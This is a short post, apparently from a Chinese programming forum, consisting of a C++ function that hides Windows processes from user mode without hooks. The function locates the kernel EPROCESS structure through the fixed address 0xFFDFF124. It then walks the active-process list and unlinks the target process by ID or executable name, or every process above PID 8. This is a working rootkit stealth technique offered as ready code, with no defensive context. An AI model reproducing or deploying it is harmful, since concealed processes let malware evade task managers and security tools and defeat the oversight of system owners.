关于进程隐藏（Ring3，不用Hook）

ULONG CProcessMgrEx::HideProcess ( ULONG dwProcessID, LPSTR szExeName )
{
    ULONG bByProcessID;

    if ( dwProcessID != NULL )
    {
        bByProcessID = TRUE;
    }
    else if ( szExeName != NULL )
    {
        bByProcessID = FALSE;
        LPSTR lpszShortName = _tcsrchr ( szExeName, _T ( \'\\\\\' ) );
        if ( lpszShortName != NULL )
            szExeName = lpszShortName + 1;
    }
    else
    {
        dwProcessID  = ::GetCurrentProcessId ( );
        bByProcessID = TRUE;
    }

    BYTE    pBuffer [ 0x1000 ];
    ULONG   pListEntryHead, pListEntryPtr;
    ULONG   uAddress;

    // CurrentThread
    uAddress = 0xFFDFF124;

    if ( ! MemoryMgr::LinearMemoryGetSafe ( &uAddress, uAddress, 4 ) )
        return 0;

    // CurrentThread -> ApcState.Process
    uAddress += m_uEProcessOffset;

    if ( ! MemoryMgr::LinearMemoryGetSafe ( &uAddress, uAddress, 4 ) )
        return 0;

    // Process -> ActiveProcessLinks.FlinkOffset
    uAddress += m_uFlinkOffset;

    if ( ! MemoryMgr::LinearMemoryGetSafe ( &uAddress, uAddress, 4 ) )
        return 0;

    pListEntryHead = uAddress;

    if ( ! MemoryMgr::LinearMemoryGetSafe ( &uAddress, uAddress, 4 ) )
        return 0;

    pListEntryPtr = uAddress;

    /* Now walk the selected list */
    do
    {
        uAddress = pListEntryPtr - m_uFlinkOffset;

        if ( ! MemoryMgr::LinearMemoryGetSafe ( pBuffer, uAddress, 0x1000 ) )
            return 0;

        ULONG dwUniqueProcessId = * ( ( ULONG * ) ( pBuffer + m_uProcessIDOffset ) );
        LPSTR lpszImageFileName = ( LPSTR ) ( pBuffer + m_uProcessNameOffset );

        ULONG dwFlink, dwBlink;

        dwFlink = * ( ( ULONG * ) ( pBuffer + m_uFlinkOffset ) );
        dwBlink = * ( ( ULONG * ) ( pBuffer + m_uBlinkOffset ) );

        if ( ( dwProcessID == - 1 && dwUniqueProcessId > 8 ) ||
                ( bByProcessID && dwProcessID == dwUniqueProcessId ) ||
                ( ! bByProcessID && ! _tcsicmp ( szExeName, lpszImageFileName ) )
                )
        {
                
            PLIST_ENTRY pFlinkList = ( PLIST_ENTRY ) dwFlink;
            PLIST_ENTRY pBlinkList = ( PLIST_ENTRY ) dwBlink;

            /* Hide this exe : throw this exe away ( out of the double linked list ) */
            SetThreadPriority ( GetCurrentThread ( ), THREAD_PRIORITY_TIME_CRITICAL );
            MemoryMgr::LinearMemoryPutSafe ( & dwBlink, ( ULONG ) & pFlinkList -> Blink, sizeof ( ULONG ) );

            SetThreadPriority ( GetCurrentThread ( ), THREAD_PRIORITY_TIME_CRITICAL );
            MemoryMgr::LinearMemoryPutSafe ( & dwFlink, ( ULONG ) & pBlinkList -> Flink, sizeof ( ULONG ) );

            SetThreadPriority ( GetCurrentThread ( ), THREAD_PRIORITY_NORMAL );
        }

        pListEntryPtr = dwFlink;
    } while ( pListEntryPtr != NULL && pListEntryPtr != pListEntryHead );

    return TRUE;
}